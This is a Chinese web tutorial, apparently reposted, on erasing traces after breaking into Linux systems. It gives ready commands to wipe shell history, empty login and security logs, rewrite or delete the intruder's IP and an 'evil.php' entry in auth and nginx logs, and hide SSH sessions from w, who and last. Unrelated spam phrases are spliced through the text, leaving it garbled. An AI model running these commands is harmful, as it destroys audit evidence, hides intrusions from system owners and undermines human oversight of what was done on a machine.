linux清除操作记录渗透过后需要清除部分操作记录,本⽂总结⼀些linux清除⽇志或隐藏的相关的操作
1.清除历史命令
删除部分不想被保存的历史命令
vim /root/.bash_history
清除当前⽤户的全部history命令记录(⼀般不推荐,痕迹很明显了)
history -c
残疾证有什么用2.在vim中执⾏清除命令,在vim中可以执⾏系统命令⽽不被history记录,通过vim执⾏清除历史记录命令
⾸先查看vim的操作历史
:history
将vim操作记录清零
:set history=0
论语全文翻译
再次查看历史命令就查不到了
执⾏系统命令,在:!之后加上命令,⽐如ls,cd等,不会被记录到
:!pwd
在vim中使⽤分屏功能,清理⽂件即可
:vsp /root/.bash_history
3.列出部分系统⽇志⽂件孙宁王学兵
/var/log/btmp 记录所有登录失败信息,使⽤lastb命令查看
/var/log/lastlog 记录系统中所有⽤户最后⼀次登录时间的⽇志,使⽤lastlog命令查看
/var/log/wtmp 记录所有⽤户的登录、注销信息,使⽤last命令查看
/var/log/utmp 记录当前已经登录的⽤户信息,使⽤w,who,users等命令查看
/var/log/secure 记录与安全相关的⽇志信息
/
李宗盛写的歌var/log/message 记录系统启动后的信息和错误⽇志
清理登录系统失败的记录
echo > /var/log/wtmp
再次查看上次登录信息
lastb
部分清除命令
清理相关⽇志信息
清除⽤户最后⼀次登录时间:echo > /var/log/lastlog #lastlog命令
清除当前登录⽤户的信息:echo > /var/log/utmp #使⽤w,who,users等命令
清除安全⽇志记录:cat /dev/null > /var/log/secure
清除系统⽇志记录:cat /dev/null > /var/log/message
4.删除/替换部分⽇志
删除所有匹配到字符串的⾏,⽐如以当天⽇期或者⾃⼰的登录IP
sed -i '/⾃⼰的ip/'d /var/log/messages
全局替换登录IP地址
sed -i 's/192.168.166.85/192.168.1.1/g' secure
清除web⼊侵痕迹
直接替换⽇志ip地址
sed -i 's/192.168.166.85/192.168.1.1/g' access.log
#清除部分相关⽇志
grep -v 排除某些字段,然后再覆盖原来的⽇志⽂件
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
#再把修改过的⽇志覆盖到原⽇志⽂件
cat tmp.log > /var/log/nginx/access.log/
5.隐藏远程SSH登录记录
隐⾝登录系统,不会被w、who、last等指令检测到。
ssh -T root@192.168.0.1 /bin/bash -i
-T表⽰不分配伪终端
如何发现隐藏的的登录励志人生的正能量句子
ps -ef|grep ssh公司起名
或者
lsof -i:22
不记录ssh公钥在本地.ssh⽬录中
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论